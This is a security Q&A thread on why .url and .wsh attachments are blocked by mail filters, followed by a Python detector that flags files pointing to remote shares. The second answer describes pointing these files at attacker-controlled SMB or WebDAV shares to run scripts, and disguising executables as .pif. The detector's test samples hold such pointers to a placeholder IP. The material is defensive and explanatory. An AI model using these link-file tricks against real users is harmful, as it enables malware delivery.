0

Why are Windows files with the extension ".url" and ".wsh" considered dangerous (e.g. blocked by many mail filters)? The way I see it:

.URL: you can link to a malicious website which serves an exploit, but it is even easier to type said URL in a mail message? You can link to a local file, but you can't pass any arguments to a local file.

.WSH: you can link to a local script. A WSH file by itself can't do anything harmful. You can't pass any argument to an existing script on the Windows system.

user3231622

2 Answers

3

.url may lead the user to click and be redirected to a website that hosts malicious exploit code, e.g. to execute exploit code on installed unpatched software.

Blocking of WSH is similar to blocking autorun.inf. Sample .WSH file from this question:

```
[ScriptFile]
Path=C:\WINNT\Samples\WSH\showprop.vbs
[Options]
Timeout=0
DisplayLogo=1
BatchMode=0
```

mootmoot
1

The answer for this is very simple:

Both WSH and URL files can point to remote shares (WebDAV or SMB), controlled by malicious people, from which malicious files such as VBS, JS, WSF (for .WSH) and e.g. .LNK (for the .URL) will be retrieved and executed:

\X.X.X.X\Share\file.ext

The address above won't show one of the '\' chars at the beginning (char filtering by this site), so just add '\' to the beginning of the address.

(.ext should be replaced with eg. one of above extensions)

Basically, wsh, url, lnk and pif are all "link-like files". (PIF is a shortcut to old MS-DOS programs, and is analogous to WSH and URL files. It still exists as of Windows 8 and 10; however, the original file format won't be recognized, but attackers can rename '.exe' to '.pif' and Windows runs it the exact same way, because the "open" command for '.exe' and '.pif' is the same -> %1 %*)

Eduardo
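A mail or endpoint filter can act on the point made in this answer by inspecting where a .url or .wsh attachment points instead of judging it by extension alone. The following is an added example, not part of the original answers: it reads the attachment body as INI text and reports every value that names a remote host (UNC path or file:// URL). The function name `remote_targets` and the sample address 198.51.100.7 are assumptions made for illustration.

```python
import configparser
import re

# UNC path (\\host\share, //host/share) or file://host/share.
# \\?\ and \\.\ prefixes are local device paths, so hosts starting with ? or . are excluded.
REMOTE = re.compile(r'^(?:file:)?[\\/]{2}(?P<host>[^\\/?.][^\\/]*)[\\/]', re.I)
LOOPBACK = {"localhost", "127.0.0.1"}

def remote_targets(text):
    """Return (section, key, host) for each value in a .url/.wsh body that names a remote share."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str            # keep key names as written in the file
    try:
        cp.read_string(text)
    except configparser.Error:
        return [("<unparseable>", "", "")]   # fail closed: let the filter quarantine it
    hits = []
    for section in cp.sections():
        for key, value in cp.items(section):
            m = REMOTE.match(value.strip().strip('"'))
            if m and m.group("host").lower() not in LOOPBACK:
                hits.append((section, key, m.group("host")))
    return hits

# Constructed samples. LOCAL_WSH is the .WSH body quoted in the first answer;
# 198.51.100.7 is a documentation address standing in for X.X.X.X.
LOCAL_WSH = r"""[ScriptFile]
Path=C:\WINNT\Samples\WSH\showprop.vbs
[Options]
Timeout=0
DisplayLogo=1
BatchMode=0
"""
REMOTE_WSH = r"""[ScriptFile]
Path=\\198.51.100.7\Share\file.vbs
"""
REMOTE_URL = r"""[InternetShortcut]
URL=file://198.51.100.7/Share/file.lnk
"""

if __name__ == "__main__":
    samples = [("local.wsh", LOCAL_WSH), ("remote.wsh", REMOTE_WSH), ("remote.url", REMOTE_URL)]
    for name, body in samples:
        print(name, remote_targets(body) or "no remote target")
```

A filter built this way can pass the local-path sample while quarantining the two that reach out to a share, and it treats a body it cannot parse as suspicious.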